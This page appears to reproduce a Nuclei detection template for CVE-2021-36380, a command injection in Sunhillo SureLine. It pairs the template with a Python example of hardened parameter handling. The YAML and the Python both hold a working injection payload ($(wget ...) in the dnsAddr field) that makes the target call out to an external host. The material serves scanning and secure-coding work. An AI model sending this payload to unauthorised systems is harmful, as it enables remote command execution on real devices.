Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection
ID: CVE-2021-36380
Severity: critical
Author: gy741
Tags: cve2021,cve,sureline,rce,oast,sunhillo,kev
Description

Sunhillo SureLine <8.7.0.1.1 is vulnerable to OS command injection. The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.
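The description above names the root cause (CWE-78: a request parameter spliced into a shell command string). The following is an added illustration, not Sunhillo's CGI script or the template's own code: it shows the vulnerable pattern beside a hardened form that validates address-typed parameters as literal IP addresses and passes them as discrete argv elements instead of through a shell. The `nslookup` command, the parameter filter and the sample request bodies (with a placeholder callback host) are constructed assumptions for the example.

```python
"""Hardened handling of networkDiag-style parameters (added example).

Illustrative only: the real SureLine script is not on the page, so the
command name and the filter below are assumptions, not the vendor's code.
"""
import ipaddress
from urllib.parse import parse_qs

# Constructed request bodies: the probe shape used by the template (callback
# host replaced with a placeholder) and a benign diagnostic request.
PROBE_BODY = ("command=2&ipAddr=&dnsAddr=$(wget+http://oast.example.invalid)"
              "&interface=0&netType=0")
BENIGN_BODY = ("command=2&ipAddr=192.0.2.10&dnsAddr=192.0.2.53"
               "&interface=0&netType=0")


def unsafe_command_string(dns_addr: str) -> str:
    """The vulnerable pattern (assumed command): the raw parameter is spliced
    into a shell string, so a shell would expand $(...) inside it.
    Returned for inspection only; nothing here executes it."""
    return "nslookup " + dns_addr


def validate_addr(value: str) -> str:
    """Accept only a literal IPv4/IPv6 address; reject anything else."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        raise ValueError(f"not an IP address: {value!r}") from None


def safe_argv(dns_addr: str) -> list:
    """Hardened form: the validated value becomes one argv element, suitable
    for subprocess.run(argv) without shell=True, so no shell parsing occurs."""
    return ["nslookup", validate_addr(dns_addr)]


def check_request_body(body: str) -> dict:
    """Parse a form body the way a request filter would and report each
    address-typed parameter as 'ok' or 'rejected'. Blank values are allowed
    because the diagnostic form itself submits them blank."""
    params = parse_qs(body, keep_blank_values=True)
    verdict = {}
    for name in ("ipAddr", "dnsAddr"):
        value = params.get(name, [""])[0]
        if value == "":
            verdict[name] = "ok"
            continue
        try:
            validate_addr(value)
            verdict[name] = "ok"
        except ValueError:
            verdict[name] = "rejected"
    return verdict


if __name__ == "__main__":
    print("probe :", check_request_body(PROBE_BODY))
    print("benign:", check_request_body(BENIGN_BODY))
    print("argv  :", safe_argv("192.0.2.53"))
```

The point of the contrast is that `safe_argv` never builds a string a shell will parse: `ipaddress.ip_address` rejects the `$(...)` substitution outright, and even a value that slipped past validation would reach the program as a single argument rather than as shell syntax.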
YAML Source

id: CVE-2021-36380

info:
  name: Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection
  author: gy741
  severity: critical
  description: Sunhillo SureLine <8.7.0.1.1 is vulnerable to OS command injection. The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade to Sunhillo SureLine version 8.7.0.1.1 or later to mitigate this vulnerability.
  reference:
    - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36380
    - https://www.sunhillo.com/product/sureline/
    - https://github.com/Ostorlab/KEV
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-36380
    cwe-id: CWE-78
    epss-score: 0.97494
    epss-percentile: 0.99977
    cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sunhillo
    product: sureline
  tags: cve2021,cve,sureline,rce,oast,sunhillo,kev

http:
  - raw:
      - |
        POST /cgi/networkDiag.cgi HTTP/1.1
        Host: {{Hostname}}

        command=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=

    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a004730450221009399c9dac7c81c43efb2ec43abfa908f004a607df3145ecb880f59df895ac6ce022076f3cad81b212a887b46179562b2d333bdeb381ad6c8f3e79466521f678bd8ea:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template detects the vulnerability in web applications. Run it with the Nuclei tool to scan a target for the behaviour described above; the matcher confirms the finding through an out-of-band (interactsh) HTTP callback rather than a response body pattern.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-36380.yaml"